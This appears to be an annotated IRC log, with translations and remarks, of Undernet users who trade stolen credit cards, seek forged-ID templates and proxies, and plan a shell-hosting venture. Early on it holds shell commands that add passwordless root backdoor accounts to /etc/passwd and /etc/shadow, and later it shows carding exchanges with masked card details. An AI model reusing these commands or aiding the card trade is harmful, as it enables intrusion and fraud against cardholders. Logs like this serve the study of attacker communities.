mins :|S4n4m| :karachi channel per on karachi channel :|S4n4m| :flori ka interview ley loo take flori's interview :|S4n4m| :mey ney appoint kya hay i have appointed (him/her?) :J4n3 :hahaha nahin thum khud hee laylo yes yes, but take it yourself (the interview) :|S4n4m| :kyon why? :|S4n4m| :tum yahn key op hoo you are the op here :|S4n4m| :admintration mey hoo i am in administration :J4n3 :op thum oh main co-founder hon you are the op, i am the co-founder :J4n3 :aaayee meraa dil......chua kay lagyeeee...churanay wali meri qaatil ohhh.... she stole my heart :|S4n4m| :han wohi hii yes, her :|S4n4m| :hello :|S4n4m| :kya hoa what happened? :J4n3 :wait :J4n3 :.up :J4n3 :.op netra :J4n3 :.op Ott0 :Dew :Hey J4n3 u there ? :J4n3 :.host add J4n3 * :J4n3 :.up :J4n3 :OngHome esay $uptime :D1ck :J4n3 :D1ck :i`m getting my own server;) :D1ck :J4n3 :D1ck :J4n3 :J4n3 :D1ck :J4n3 :i'm here :D1ck :hehe :D1ck :J4n3 :J4n3 :hehe :J4n3 :D1ck :D1ck :oye give me those commands for linux password adding and sun adding re ro re r i gave u :D1ck ::P :D1ck :i lost mine :J4n3 :wait :D1ck :and i dont wana make again :J4n3 :cp /etc/passwd /etc/.tp; :J4n3 :echo "ro::99999::::::" >> /etc/shadow; :J4n3 :echo "r::99999::::::" >> /etc/shadow; :J4n3 :echo "ro:x:500:1000::/:/bin/bash" >> /etc/passwd; :J4n3 :echo "r:x:0:0::/:/bin/bash" >> /etc/passwd; :J4n3 :cp /etc/shadow /etc/.ts; :D1ck :k :J4n3 ::p :D1ck :and suhn :D1ck :? :D1ck :sun :D1ck :? :J4n3 :wait :D1ck :gimme sun tew :D1ck :k :J4n3 :cp /etc/passwd /etc/.tp; :J4n3 :echo "re::6445::::::" >> /etc/shadow; :J4n3 :echo "r::10891::::::" >> /etc/shadow; :J4n3 :echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd; :J4n3 :echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd; :J4n3 :cp /etc/shadow /etc/.ts; :D1ck :thx :J4n3 :np :p :D1ck :oye :D1ck :me getting a box :D1ck :T+3 :D1ck :T3 :J4n3 :wow :J4n3 :kewl :D1ck :where should i get? :D1ck :where is j0e getting :D1ck :d4v3 i want the folling domains :J4n3 :folling ? (Note:: misspelt "following") :D1ck example.org :J4n3 :j0e say contact nahi huwa called him 2 times j0e said there has been no contact ... called him 2 times :D1ck :wetcunts.net :J4n3 :example hmm :J4n3 :mil jayega agar register nahi huwa hai tho we will get it if it has not been registered :D1ck :undefined.net :D1ck :and kewl ones :D1ck :but not one's that end with zzz :D1ck :like dreamzzz.net :D1ck :etc :D1ck :eeet.org :D1ck :eeet.net :D1ck :oye :D1ck :how much j0e paid :D1ck :and what server? :J4n3 :he paid 250 $ :J4n3 :from example.net :D1ck :kewl :D1ck :for a T3? :J4n3 :and yeah example.org and com net all available :p :J4n3 :T1 i think :D1ck :kewl :D1ck :get me please :D1ck :oh :J4n3 :yaar CC :( :J4n3 :no CC right now :J4n3 :yaar u have that bind weapon why dont u hit a big shoping site and take cc's ? (Note:: here's where they hatch the idea of stealing CCs) :D1ck :yep :D1ck :oki :D1ck : welp why dont we all hang in :D1ck :it was my channel and i think ti still is :J4n3 :abay yaar sub fraud hotha hai wahan par hey dude, a lot of fraud goes on there :J4n3 :their CC's do not work :D1ck :hehe :J4n3 :bauth try kiya hai undernet and effnet par tried a lot on undernet and effnet :D1ck :k :D1ck :heh k :D1ck : DIGITALINET offers quality web hosting staring at 6$ a :D1ck : month. Signup for webhosting with digitalinet and get your :D1ck : domain for 11$ a year :D1ck : information. :D1ck :i`ll buy 2 legit domains there :J4n3 :haha i had a shell from there :D1ck :kewl :J4n3 :they closed shell service now :J4n3 :adult web hosting :p :D1ck :lol :J4n3 :service achee thee buree nahin thee the service was good, not bad at all :D1ck :haha :J4n3 :oye sex time :J4n3 :brb :J4n3 :br :J4n3 :bbl :J4n3 :shayed so gaya seems like he's gone to sleep :D1ck :ahahahha :J4n3 :hehe :J4n3 :g0ne :D1ck :.join :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :^w1nX^ :cc :^w1nX^ :cc :^w1nX^ :sleepin chann :^w1nX^ :trade :^w1nX^ :sleepin chann :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :trade :atlanta.ga.us.undernet.org 005 spitz SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :nirvana19 :e cinevA de aici si pe rocarding? @ is somebody here also on #rocarding? (Note:: definitely not urdu here :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :Bl4ck_ :not again :Bl4ck_ :-up :nirvana19 :I buy stuff :SLaZz :who wants to trade cc's ?? :nirvana19 :gfnbfg :nirvana19 :someone from romania? :savantul :yes :_Mephisto :multi @ a lot of (people) :_Mephisto ::) :nirvana19 :aveti ceva marfa? @do you have some stuff? (Note:: ??) :nirvana19 :cumpar @ I buy :_CardMan_ :re ppl :Bl4ck_ :arrrrrrrrrrrrrrrrr :Bl4ck_ :-up :_CardMan_ :what is new ? :Bl4ck_ :shitttttttttttttt :_CardMan_ :stupid bots :Bl4ck_ :-up :Bl4ck_ :-up :_CardMan_ :this is fun.... :Bl4ck_ :Omblad0n up :Bl4ck_ :Omblad0n op :Bl4ck_ ::>> :Bl4ck_ :arrrrrr :_CardMan_ :Bl4ck_....do u know what u r doing ? :Bl4ck_ :dunoo :_CardMan_ :i saw.... :_CardMan_ :so ... any romanian people here ? :bug____ :ops :_CardMan_ :bug____...whats up ? :savantul :lots :bug____ :nimic man @ nothing man :_CardMan_ :ok... :bug____ :I need cc :bug____ :lol :_Mephisto :me too :_CardMan_ :pai care e din bucale si are niste cc-uri bune (NU bunicele, sau extrapolate) sa initieze o privata repede.... @ so, those who is from Bucharest and who has some good cc (NOT "good enough" or extrapolated), let's start fast "a private one" (conversation) ... (Note:: ??) :nirvana19 :da o gramada de romanian pepole pe aici @ lots of romanian people here (Note:: ??) :bug____ :1 cc :bug____ :1 :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... @ so, those who is from Bucharest and who has some good cc, not bogus, let's start fast "a private one" (conversation) ... :_CardMan_ :care esti pe kappa (IP: 192.168.254.95 :_CardMan_ :DNS: dialup-56k-95.example.xx :_CardMan_ :si dai cu scanarea ? @ who are you on kappa (IP: 192.168.254.95 @ DNS: dialup-56k-95.example.xx ( kappa.ro ??) @ and are you scanning ? :nirvana19 :de unde pot sa fac rost de Legion 2.1 @where can I get Legion 2.1 :_Mephisto :de la mine @from me :_CardMan_ :nirvana19.... LOLZ... nu stiai ca are back door mah ? @ ...LOLZ... didn't you knew that is has backdoor? :nirvana19 :poti sa mi-l dai? @ could you give it to me? :dlotos33 :Is there any Romania friends? :bug____ :nope :dlotos33 :Is there any Romania friends? :_CardMan_ :a lots :Co0lWoRx :any1 here wanna earn +v, msg me :Co0lWoRx :any1 here wanna earn +v, msg me :v|Adu :re :v|Adu ::) :Co0lWoRx :ACTION any1 here wanna earn +v, msg me :v|Adu :anybody need a drop place ? :nirvana19 :de unde esti ma vladule? @ where are you from vladu? :_CardMan_ :v|Adu.... lasa-te de meserie .... @ ... got it lost .... :v|Adu ::))))))) :v|Adu :cardman :v|Adu ::) :v|Adu :hahahahah :v|Adu ::) :_CardMan_ :suck it (Note:: ?? - all this is either romanian or some other language) @ yes, this is romanian slang :Co0lWoRx :ACTION any1 here wanna earn +v, msg me :nirvana19 :sorry :Co0lWoRx :ok :Co0lWoRx :np :xroach :anybody have any driver license template ? :xroach :anybody have any driver license templates ? :bug____ :u can save my ass with 1 cc :xroach :actually any good templates would be nice :bug____ :I got some sites :v|Adu :re :Co0lWoRks :ACTION any1 wanna earn +v in :Co0lWoRks :ACTION any1 wanna earn a virgin card, msg me now :Co0lWoRks :ill bbl, since no one wants anything here :Bl4ck_ :-up :Bl4ck_ :? :Bl4ck_ :soory :Bl4ck_ :I`ll go :dlotos33 :anyone have CC? :s1z1f :yes :xroach :anyone have or know where i could get license templates or any templates for mag cards ? :s1z1f :do enyone have cc? :dlotos33 :Does any one speak germany? :_CardMan_ :do not think so ... :2red :i speak some german :2red :why? :dlotos33 :What means "ORT" at GERMANY? :2red :city? :dlotos33 :thank you ,my friend :MaTiX_00 :hello :MaTiX_00 :anyone got a proxy for me to use? :dlotos33 :yes :SpRiTe^^^ :HI :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... @ (idem) :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :0,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :0,0 1,1 xxxx xxxx xxxx xxxx :kurky :Any GOOOOOOOD carders here? msg me :kurky :Anyone here got a UK cc??? Msg me :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :][VaMpIrE :hi :][VaMpIrE :wanna trade? :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... @ (idem) :_CardMan_ :m4r1n4ru...salve mah @ m4r1n4ru...hello man :m4r1n4ru :-op :xroach :anybody have any dl templates ? cia/fbi/nsa would be cool too :s1z1f :do enybody have cc? :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :s1z1f :do enybody have cc? :[SK]Kane :care aveti un proxy bun de www? @ who has a good www proxy? :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... @ (idem) :SpRiTe^^^ :H :SpRiTe^^^ :ok :m4r1n4ru :-op :s1z1f :do enybody have cc? :s1z1f :do enybody have cc? :dariuss :am yo 1000 :s1z1f :do enybody have cc? :natedogg :i do.. :s1z1f :pls give it to me :natedogg :trade... :natedogg :mgs me.. :s1z1f :pls give it to me :s1z1f :do enybody have cc? :natedogg :sizif ---------------banned#no more trade kind..... :s1z1f :do enybody have cc? :s1z1f :pls give it to me :s1z1f :do enybody have cc? :pimpg :yeah :pimpg :if you would like one you have to send me one first :pimpg :then if it approves :s1z1f :ok :pimpg :i will send one to you :pimpg :sound good :pimpg :pm me if you would like me 2 :D1ck :Tota1KaaS join #delusion :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon. :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :) :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon. :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :) :dariuss :Bl4ck_-)) :Bl4ck_ :se man :s1z1f :*** pimpg (~ricky@exo01-ca.example.net) has joined :s1z1f :*** Retrieving :s1z1f : do enybody have cc? :s1z1f : pls give it to me :s1z1f :*** Retrieving :s1z1f :*** natedogg has quit IRC (Signed off) :s1z1f : do enybody have cc? :s1z1f : yeah :s1z1f : if you would like one you have to send me one first :s1z1f : then if it approves :Ghici :re ppl :pimpg :hello :pimpg :would anyone like to trade, i dont go first :D1ck :D4v3 :D1ck :WHEN BACK MSG ME :s1z1f :do enybody have cc? :dariuss :ACTION c ya :m4r1n4ru :Away :m4r1n4ru :I have Returned. :m4r1n4ru :Away :s1z1f :do enybody have cc? :m4r1n4ru :Away :Bon_Jovi :m4r1n4ru :s1z1f :do enybody have cc? :Bon_Jovi :yep :m4r1n4ru :Away :m4r1n4ru :Away :s1z1f :do enybody have cc? :m4r1n4ru :Away :D1ck :hey J4n3 :J4n3 :what's new :p ? :D1ck :server :D1ck :buying :D1ck :but what did j0e say :D1ck :which is good one? :J4n3 :buying ? confirmed ? :D1ck :i got 10 domains (Note:: at this point i guess they have closed the deal with the previous CCs) :D1ck ::P :D1ck :freind bought them :D1ck :hreh :D1ck :yup :J4n3 :usay khud sahi nahi patha usnay sirf example try kiya hai aur wo sahi nahi laga usay he himself doesnt know really, he just tried example and it didnt look all right to him :D1ck :example.net sux? :D1ck :oh :J4n3 :great :D1ck :(@J4n3): great :D1ck :? :J4n3 :haha u said friend already bought it ? :D1ck :domains :D1ck ::) :J4n3 :oh :J4n3 :but from where u planning to buy ? :D1ck :kuch samhaj nahi aa rahi cant understand anything :D1ck :where should i buy :D1ck :Server Space: Single Server :D1ck :IP Numbers: 30 :D1ck :Bandwidth: 50 Gigs :D1ck :Services: Level 1 (Included) :D1ck :Monitor: 24/7 Network Monitoring (Included) :D1ck :-------------------------------------------------------------------------------- :D1ck :Payment Plan: $2,182.80 paid Annually :D1ck :Setup Fee: $100.00 :D1ck :-------------------------------------------------------------------------------- :D1ck :Total Startup: $2,282.80 :D1ck :SkyNetWEB Ltd. :D1ck :3500 Boston St. :D1ck :Baltimore Maryland, 21224 :D1ck :Phone: 410.563.6384 :D1ck :Fax: 410.563.5457 :D1ck :Server Space: Single Server :D1ck :IP Numbers: 30 :D1ck :Bandwidth: 50 Gigs :J4n3 :2,828 ? :D1ck :Services: Level 1 (Included) :D1ck :Monitor: 24/7 Network Monitoring (Included) :D1ck :-------------------------------------------------------------------------------- :D1ck :Payment Plan: $2,182.80 paid Annually :D1ck :Setup Fee: $100.00 :D1ck :-------------------------------------------------------------------------------- :D1ck :Total Startup: $2,282.80 :D1ck :SkyNetWEB Ltd. :D1ck :3500 Boston St. :D1ck :Baltimore Maryland, 21224 :D1ck :Phone: 410.563.6384 :D1ck :Fax: 410.563.5457 :D1ck :yeah :D1ck :per year :D1ck ::(? :D1ck :or :? :J4n3 :but he got it about 800 $ total i think with all system p2 400 64 mb ram and 8.4 gb hd :D1ck ::)? :m4r1n4ru :Away :D1ck :but :D1ck :that was one month :D1ck :remmeber? :J4n3 :hmm :J4n3 :u mean thats all for one year ? :J4n3 :and u gonna pay for it ? :D1ck :tell me :D1ck :what should i do? :D1ck :i`m confewsed (Note:: you man "confused"... kiddie) :J4n3 :yaar aaj raath tak wait karlo dude, wait till tonight :J4n3 :let me ask some more ppl :D1ck :oki :J4n3 :teeek haina ? it's ok with you, right? :J4n3 :i'll ask miller too :D1ck :oki :D1ck :ok :D1ck :my budget is 170-200/month :J4n3 :hmm k :D1ck :>Domain Name 1....: example.com :D1ck :>Domain Name 2....: example.com :D1ck :>Domain Name 3....: example.com :D1ck :>Domain Name 4....: example.com :D1ck :>Domain Name 5....: example.com :D1ck :>Domain Name 6....: example.com :D1ck :>Domain Name 7....: example.com :D1ck :>Domain Name 8....: example.com :D1ck :>Domain Name 9....: example.com :D1ck :>Domain Name 10...: example.com :D1ck :>Total............: $649.50 :J4n3 :oh already registered ? :D1ck :yup :J4n3 :how many years ? :D1ck :1 :J4n3 :thats expensive :J4n3 :wait :D1ck :who cares :D1ck :its cared :J4n3 :let me check :J4n3 :oh :J4n3 :then its ok but wait :D1ck :oki :D1ck :(Sephirot): I need help , SOme one can help me :J4n3 :heh :D1ck :=p :J4n3 :oye :D1ck :? :J4n3 :u could got those 10 domain for 2 years at 300 $ and for 5 years at 750 $ :D1ck :kewl :D1ck :from where? :J4n3 :dotster :D1ck :dotster.com :D1ck :? :J4n3 :1 year: $15 2 year: $30 :J4n3 :5 year: $75 10 year: $150 :J4n3 ::) :J4n3 :yeah :D1ck :cool :D1ck ::P :J4n3 :we'll get more from there :D1ck :oki :D1ck :;) :D1ck :yaar dude :D1ck :i want the server :D1ck :b4d :D1ck :kuch samhaj nahin aa rahi cant understand anything :J4n3 :haha jald baazi math karo haha, dont make haste :D1ck :oye who could make a kewl kewl kewl webpage for webhosting and shell accounts? :m4r1n4ru :Away :J4n3 :coz u going to pay from ur pocket :D1ck :lol oki :J4n3 :zara ache thara maaloom karnay do let's locate some good chap :D1ck :ok;) :J4n3 :page design karnay ka masla nahi wo hojayega dont worry dont worry about the page design problem, it shall be done :D1ck :oki kewl :D1ck ::) :D1ck :oye :J4n3 :i'm gonna open a cosmetics shop at tariq road :p :D1ck :1pani nay apna server liya tha or rent? has j0e bought the server or rented it? (Note:: aek in hindi/urdu - pronounce: ache... means one. so 1pani would be j0e that they always refer to) :J4n3 :yea ? :J4n3 :liya tha had bought it :D1ck :kewl hehe :D1ck ::/ :D1ck ::/ :J4n3 :agar thum kaho tho j0e kee baath karwatha hon thum say if you say so, i can tell you j0e's deal :D1ck :oh :J4n3 :usay kahonga thumain call karday i will ask him to call you :J4n3 :ok ? :D1ck :ok :D1ck :sure :D1ck ::) :D1ck :but after 9 :D1ck :but after 9 pm :J4n3 :teeek hai phir khud hee pooch lena sub kuch ok then just ask him everything yourself :D1ck :coz i`ll be sleeping :J4n3 :hmm ok :D1ck :k;/ :D1ck :;/ :J4n3 ::) :J4n3 :tariq road , cosmetic shop, kewl kewl bachiyan *wink* bachiyan = chicks :D1ck :lol :D1ck :hahahaha :J4n3 :hehe yeah :J4n3 :have u seen that new building dolmen mall ? :D1ck ::P :D1ck :nop :m4r1n4ru :Away :J4n3 :hmm phir dekhna , its kewl and most beautiful market in karachi hmmm then take a look at it, it's cool and most beautiful market in karachi :J4n3 :yaar give me a kewl host , aisa jis main psybnc chalaon aur crash na ho, meray ziyad thar roots main make command work nahi kartha :( dude, give me a cool host, such that if we run psybnc on it, it doesnt crash. (Note:: i am having problems with some urdu words, but the word-by-word translation for the rest of it is: meray = mine main = in nahi = doesnt kartha = happens the last part is.."make command doesnt work in this") :D1ck ::)) :D1ck :oh :D1ck :i will send u psybnc-compiled :D1ck :when i boot :D1ck ::) :J4n3 :oh then its kewl :) :J4n3 :tight :J4n3 :for sparc na ? :D1ck :yeps :J4n3 :great waiting ... :D1ck :abey abhi ruk heheheh hey wait for now heheheh :D1ck :i am tlking to the person for col :D1ck ::P :D1ck ::pPpp :J4n3 :haha ruka huwa hon jub boot karo tho daydena hehe haha, i am waiting. when you boot then give it up hehe :D1ck :*** Joins: tOpDaWgGy (KoRn@spc-isp-tor-58-18-419.example.xx) :D1ck :(tOpDaWgGy): dAwGgGYY :D1ck :(tOpDaWgGy): chinii :D1ck :(tOpDaWgGy): jApAniIii :D1ck :(@D1ck): hEYyYYyYy :D1ck :(@D1ck): dOgYY :D1ck :hehehe :J4n3 :hehehe :D1ck ::) :m4r1n4ru :Away :D1ck :oye :D1ck :read :D1ck :http://www.example.net/Contracts/CIT-Colocation%20Agreement.html :D1ck :tell me i it have some clawa :D1ck :tell me i it have some claws :J4n3 :wait :D1ck :k :J4n3 :errror araha hai there's an error :D1ck :works for me :J4n3 :hmm nope not working let me try on netscape :D1ck :k :D1ck :(tOpDaWgGy): shAe.. dAwG bhai :J4n3 :Plan A: 20 gigs/month [64kbps avg.], * up to 30 IP addresses ($150.00 :J4n3 : per month) :D1ck :is ko doggy kay ilawa this one as an alternative to doggy :J4n3 :thats what u want to buy ? :D1ck :nope :D1ck :40 gig :D1ck :256 ips :J4n3 :Plan B: 40 gigs/month [128kbps avg], * up to 62 IP addresses ($250.00 :J4n3 : per month) :J4n3 :its 62 in 40 gigs :D1ck :yep but he sed he will allow 256 if not needed :D1ck :needded :J4n3 :oh then its okay package is kool :D1ck :kewl :J4n3 :.msg G_u_Y__ abay oye chichoray mmoooon band kar apna hey you squirt, shut your mouth PRIVMSG G_u_Y__ :abay oye chichoray mmoooon band kar apna hey you squirt, shut your mouth :D1ck :best firwalling and dos protection in town :D1ck :lol :J4n3 :hmm kewl :J4n3 :oye add my this host to bots plz :) :m4r1n4ru :Away :D1ck :sure :D1ck :whats yure ip :D1ck :/whois J4n3 :J4n3 :* :D1ck :onghome.com :D1ck :oki :D1ck :.host add J4n3 * :D1ck :brb :J4n3 :thanx :) :m4r1n4ru :Away :J4n3 :.join #karachi :m0sTwAnTdpinG :G_u_Y__ you and i will get along well :J4n3 :.msg #karachi GUY ullooo kay pattay moon band rakko apna you stupid chaps, keep your mouth shut :sawera hey ask those who are about to die what their last wish is :G_u_Y__ :J4n3 :oops :J4n3 : ? :J4n3 :say A? :G_u_Y__ dearest :J4n3 :.say #karachi GUY Ullooo kay pattay mooon band rakko apna :p you stupid chaps, keep your mouth shut :J4n3 :.part #karachi :m4r1n4ru :Away :D1ck :J4n3 :D1ck :my dadi's bro died today, so my dad is off to lahore :D1ck :shit :D1ck :ab this kaam will latkofy now this work will be left hanging :J4n3 :oh :J4n3 :Inna lillaaye wa inna ilayae raajioon (Note:: some prayer to allah it seems) :J4n3 :very sorry :D1ck ::p :D1ck :yep he was 85, this is life, ppl come and go :D1ck :hehe :D1ck :its ok :D1ck :;) :J4n3 :oh :D1ck ::) :J4n3 :phir tho time tha jaanay ka unkay then it was time for him to go :J4n3 :i thought he was young :J4n3 ::p :D1ck :nop :D1ck :hehe :J4n3 :hehe :D1ck ::) :D1ck :oye :D1ck :what i say is :D1ck :hm :J4n3 :is ? :D1ck :chalo time mil gaye ga come we shall get the time :D1ck :now we can investiagte :J4n3 :yeah yeah :J4n3 ::) :D1ck :(g|nger`): well :D1ck :(g|nger`): i have like 20 :D1ck :(g|nger`): example.org example.org example.com example.net example.com example.com example.org will-fuck-up-example.com example.com example.com example.com example.com example.com :D1ck :(g|nger`): plus others :D1ck :(g|nger`): you can have whatever vhosts you want :D1ck :kewl? :m4r1n4ru :Away :J4n3 :yeah kewl :D1ck :PHAT6 :D1ck :;pp :J4n3 :if we have domains, we can have vhost of whatever we like :D1ck :yaar is it possibl that u can help me with wrebpage :P? :D1ck :i cant do alone, coz i have 0-webpage skilzl :D1ck :hehe :J4n3 :yeah yeah i'm with u always :J4n3 ::) :D1ck :iknowheh :J4n3 :dont feel ur self alone :D1ck :kool:) :D1ck :kleet :J4n3 ::) :D1ck :aur sunao so what else is new? :D1ck :what haWt :J4n3 :nutthin hot naveed nay chars maanga hai hehe nothing's hot. naveed has asked for some marijuana (chars = marijuana/pot) :D1ck :HAHAHAHAAHAHA :J4n3 :hehehe yeah :D1ck :woh charas peeta hai? apni girlfreind ka chakroon may juis nay is ko ghaas nahindali? does he do marijuana? (Note:: something about his girlfriend being involved in marijuana too) :D1ck :ROFL :J4n3 :lol :D1ck ::) :D1ck ::) :J4n3 :hah chars tho shroo say peetha hai pehlay bee main day chuka hon usko hah. he was having marijuana since the beginning. earlier i had given him some too :D1ck :lol :D1ck :oki :D1ck :tum charas latay hoon? do you also do marijuana? :[Agent] :anyone wants to have proxy list, cc list, RH bash shell eggable..msg me if ur serious :J4n3 :haan , i have many relations with drug mafia hehe :D1ck :(if answer=yes) { d4v3== "should not take" else printf ("its ok\n"); :D1ck :lol :Flapjack- :Anyone trade cc for bnc? Msg me :D1ck :char drugs[80]' :D1ck :char drugs[80]; :J4n3 :hehe :J4n3 :lol :D1ck ::) :J4n3 :main bee peetha hon kabee kabee mood hoay par i have some depends on the mood :D1ck :oh :D1ck :(@|S4n4m|): wasalamz salutations :D1ck :(sawera): w/salam :D1ck :chix? :D1ck :bawt? :J4n3 :yup |S4n4m| = mine :D1ck :hahaa :D1ck :all-chicks = yure :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks :J4n3 :<|S4n4m|> key tum ko kuch kam karna hay hey do you want to do some work? :J4n3 :> thum falsafi kub say ban gayee ? since when did you become a philosopher? :J4n3 :<|S4n4m|> jab sey tum sey bat ki hay since the time i've started talking to you :J4n3 :aaaaahhhhhhhhhh :D1ck :hhaha :D1ck ::P :D1ck :mv logs.txt bhabi.txt (Note:: bhabi = sister-in-law) :J4n3 :lol :J4n3 :oye :D1ck : cat bhabi.txt :D1ck : I WILL KILL U D4v3 :D1ck :? :J4n3 :muhahahahahhahahahahhhaa :J4n3 :HHAHAHAHAHAHAH :D1ck ::) :J4n3 :heheheheh :J4n3 :ROFLMAO :D1ck :(: :J4n3 :ROFLMAO :D1ck :=P :m4r1n4ru :Away :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks :m4r1n4ru :Away :Dariox :who trade cc :m4r1n4ru :Away :m4r1n4ru :Away :m4r1n4ru :Away :m4r1n4ru :Away :m4r1n4ru :Away :[Agent] :anyone can card me a laptop? :m4r1n4ru :Away :m4r1n4ru :Away :telnet- :anyone can card me a shell or web domain....pls answer to me :m4r1n4ru :Away :[Agent] :wanna trade -=- Day 13 June 16 :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :D1ck! :Anyone have any "Gold-Line" Canadian Calling card #'s ?? :m4r1n4ru! :Away :[4g3nt]! :anyone can tell how to use a company credit card ???? :m4r1n4ru! :Away :TanTouze! :hi goober... oops wrong window :Ricky! :if someone would like to xchange cards contact me :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :yo m4r1n4ru, stop it pls :Co0lWoRx! :damn it, im tired of all this shit :Co0lWoRx! :ok? :Ricky! :ii have 2 cards i will trade :Ricky! :i dont go first :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :ABA! :Anyone want to trade cards? :ABA! :Anyone want to trade cards? :m4r1n4ru! :Away :ABA! :Anyone want to trade cards? (msg me now) :AlfonsoD! :im trading too :ABA! :msg me AlfonsoD :AlfonsoD! :anyone trading? :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :ABA! :Anyone trading cards? :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :[4g3nt]! :yo :[4g3nt]! :is a master card a 16 digit or 13 ? :ABA! :16 :D4r1u55! :? :ABA! :xxxx/xxxx/xxxx/xxxx :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :D4r1u55! :wow :D4r1u55! :ABA :D4r1u55! :look here :D4r1u55! :[10:24] Not Approved: Customer information invalid. :D4r1u55! :[10:24] Not Approved: Invalid Credit Card Number. :D4r1u55! :u give me 2 cc's.but are not viabils :D4r1u55! :[10:11] Dick xxxxxxx :D4r1u55! :[10:11] xxx St Example St :D4r1u55! :[10:11] Somewhere US :ABA! :I gave you two working CCs :ABA! :then :ABA! :you try to send me :ABA! :some bullshit :D4r1u55! :10:11] 10320 :D4r1u55! :[10:11] 06/200x :D4r1u55! :[10:11] Mastercard. :D4r1u55! :[10:11] xxxx xxxx xxxx xxxx :D4r1u55! :[10:11] . :ABA! :1.2meg html file :D4r1u55! :[10:11] John Salvo :ABA! :fucking thief :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :D4r1u55! :[10:11] 1175 Example Ave :D4r1u55! :[10:11] 33146 :D4r1u55! :[10:11] VISA :D4r1u55! :10:11] VISA :D4r1u55! :[10:11] 12/200x :D4r1u55! :[10:11] xxxxxxxxxxxxxxxx :D4r1u55! :and that's all :ABA! :you lame gimp :ABA! :youve got them the wrong way round :ABA! :thief :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :m4r1n4ru! :Away :D4r1u55! :that two cc's u send to me :D4r1u55! :and are'nt good :D4r1u55! :dont work :D4r1u55! :try to understand :D4r1u55! :whatever :[4g3nt]! :how can i card a company cc? :ABA! :4No one trade with D4r1u55 :ABA! :4Hes a ripper :[4g3nt]! :hihi :[4g3nt]! :anyone can tell me how to use a company owned cc?? :m4r1n4ru! :Away :Emy__! :I need some Cc `z (Visa) :Emy__! :... :ABA! :Anyone want to trade cards, msg me. :Emy__! :I need some credit cards .... Visa :ABA! :Emy MSG me then :m4r1n4ru! :Away :D4r1u55! :ACTION plek pa :J4n3! :nettlink :ABA! :ANYONE want to trade cards? :Emy__! :I need some credit cards .... Visa :ABA! :Message me then you fucking idiot :ABA! :how many more times :m4r1n4ru! :Away :2red! :ACTION is selling virgin credit cards, /msg me for deal. :ABA! :4ANYONE want to trade cards? Msg me :ABA! :4ANYONE want to trade cards? Msg me :[4g3nt]! :fuck ABA <<< ripper :[4g3nt]! :fuck ABA <<< ripper :[4g3nt]! :fuck ABA <<< ripper :Emy__! :I need some credit cards .... Visa :m4r1n4ru! :Away :ABA! :4ANYONE want to trade cards? Msg me :ABA! :4ANYONE want to trade cards? Msg me :m4r1n4ru! :Away :Emy__! :anybody want to give me a cc ?? :m4r1n4ru! :Away :m4r1n4ru! :Away :m4r1n4ru! :Away :ABA! :Anyone want to trade cards? :sunfire! : :ABA! :Anyone want to trade cards? :m4r1n4ru! :Away :m4r1n4ru! :Away :connex! :anyone can help me to buy a shell? :m4r1n4ru! :Away :m4r1n4ru! :I have Returned. :m4r1n4ru! :-op :sunfire! : :-) :|DONNIE|! :ne1 have BNC...i have virgin.. :|DONNIE|! :lets trade 